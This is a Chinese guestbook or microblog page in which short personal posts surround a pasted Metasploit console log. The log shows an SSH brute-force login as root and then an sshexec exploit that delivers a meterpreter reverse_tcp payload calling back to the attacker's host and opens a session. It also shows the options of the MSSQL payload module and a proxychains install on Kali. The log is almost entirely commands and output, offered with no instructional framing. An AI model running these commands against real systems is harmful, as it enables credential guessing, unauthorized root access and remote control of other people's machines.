会python真的可以为所欲为0(回)
400天前
这里还有人吗1(回)
585天前这里还有人吗0(回)
585天前
每天面对着电脑屏幕,敲打键盘。我所面对的并不只是代码,而是一种生活方式。0(回)
810天前到处都是羊,不想上班0(回)
890天前
鸽子
0(回)
894天前msf exploit(sshexec) > use auxiliary/scanner/ssh/ssh_login |
msf auxiliary(ssh_login) > show options |
Module options (auxiliary/scanner/ssh/ssh_login): |
Name Current Setting Required Description |
---- --------------- -------- ----------- |
BLANK_PASSWORDS true no Try blank passwords for all users |
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 |
DB_ALL_CREDS false no Try each user/password couple stored in the current database |
DB_ALL_PASS false no Add all passwords in the current database to the list |
DB_ALL_USERS false no Add all users in the current database to the list |
PASSWORD no A specific password to authenticate with |
PASS_FILE no File containing passwords, one per line |
RHOSTS yes The target address range or CIDR identifier |
RPORT 22 yes The target port |
STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host |
THREADS 1 yes The number of concurrent threads |
USERNAME no A specific username to authenticate as |
USERPASS_FILE no File containing users and passwords separated by space, one pair per line |
USER_AS_PASS true no Try the username as the password for all users |
USER_FILE no File containing usernames, one per line |
VERBOSE true yes Whether to print output for all attempts |
msf auxiliary(ssh_login) > set RHOSTS 192.168.1.104 |
RHOSTS => 192.168.1.104 |
msf auxiliary(ssh_login) > set USERNAME root |
USERNAME => root |
msf auxiliary(ssh_login) > set PASS |
set PASSWORD set PASS_FILE |
msf auxiliary(ssh_login) > set PASSWORD toor |
PASSWORD => toor |
msf auxiliary(ssh_login) > exploit |
[*] 192.168.1.104:22 SSH - Starting bruteforce |
[*] 192.168.1.104:22 SSH - [1/3] - Trying: username: 'root' with password: '' |
[-] 192.168.1.104:22 SSH - [1/3] - Failed: 'root':'' |
[*] 192.168.1.104:22 SSH - [2/3] - Trying: username: 'root' with password: 'root' |
[-] 192.168.1.104:22 SSH - [2/3] - Failed: 'root':'root' |
[*] 192.168.1.104:22 SSH - [3/3] - Trying: username: 'root' with password: 'toor' |
[*] Command shell session 4 opened (192.168.1.105:54562 -> 192.168.1.104:22) at 2014-08-07 22:55:54 +0800 |
[+] 192.168.1.104:22 SSH - [3/3] - Success: 'root':'toor' 'uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=system_u:system_r:unconfined_t:SystemLow-SystemHigh Linux localhost.localdomain 2.6.18-164.el5 #1 SMP Thu Sep 3 03:33:56 EDT 2009 i686 i686 i386 GNU/Linux ' |
[*] Scanned 1 of 1 hosts (100% complete) |
[*] Auxiliary module execution completed |
msf auxiliary(ssh_login) > sessions |
Active sessions |
=============== |
Id Type Information Connection |
-- ---- ----------- ---------- |
4 shell linux SSH root:toor (192.168.1.104:22) 192.168.1.105:54562 -> 192.168.1.104:22 (192.168.1.104) |
msf auxiliary(ssh_login) > |
msf> use exploit/multi/ssh/sshexec |
msf exploit(sshexec) > set payload linux/x86/meterpreter/reverse_tcp |
payload => linux/x86/meterpreter/reverse_tcp |
msf exploit(sshexec) > set LHOST 192.168.1.105 |
LHOST => 192.168.1.105 |
msf exploit(sshexec) > set LPORT 8080 |
LPORT => 8080 |
msf exploit(sshexec) > set RHOST 192.168.1.104 |
RHOST => 192.168.1.104 |
msf exploit(sshexec) > set PASSWORD toor |
PASSWORD => toor |
msf exploit(sshexec) > exploit |
[*] Started reverse handler on 192.168.1.105:8080 |
[*] 192.168.1.104:22 - Sending Bourne stager... |
[*] Command Stager progress - 40.39% done (288/713 bytes) |
[*] Transmitting intermediate stager for over-sized stage...(100 bytes) |
[*] Sending stage (1228800 bytes) to 192.168.1.104 |
[*] Command Stager progress - 100.00% done (713/713 bytes) |
[*] Meterpreter session 3 opened (192.168.1.105:8080 -> 192.168.1.104:40813) at 2014-08-07 22:53:12 +0800 |
meterpreter > |
msf exploit(psexec) > use exploit/windows/mssql/mssql_payload |
msf exploit(mssql_payload) > show options |
Module options (exploit/windows/mssql/mssql_payload): |
Name Current Setting Required Description |
---- --------------- -------- ----------- |
METHOD cmd yes Which payload delivery method to use (ps, cmd, or old) |
PASSWORD no The password for the specified username |
RHOST yes The target address |
RPORT 1433 yes The target port |
USERNAME sa no The username to authenticate as |
USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) |
Exploit target: |
Id Name |
-- ---- |
0 Automatic |
msf exploit(mssql_payload) > |
root@kali:~# git clone https://github.com/rofl0r/proxychains-ng.git |
正克隆到 'proxychains-ng'... |
remote: Counting objects: 842, done. |
remote: Total 842 (delta 0), reused 0 (delta 0) |
Receiving objects: 100% (842/842), 465.92 KiB | 27 KiB/s, done. |
Resolving deltas: 100% (554/554), done. |
root@kali:~# cd proxychains-ng/ |
root@kali:~/proxychains-ng# ./configure --prefix=/usr --sysconfdir=/etc |
Done, now run make && make install |
root@kali:~/proxychains-ng# make && make install |
by: 发表于:2017-11-02 09:49:49 顶(0) | 踩(0) 回复
??
回复评论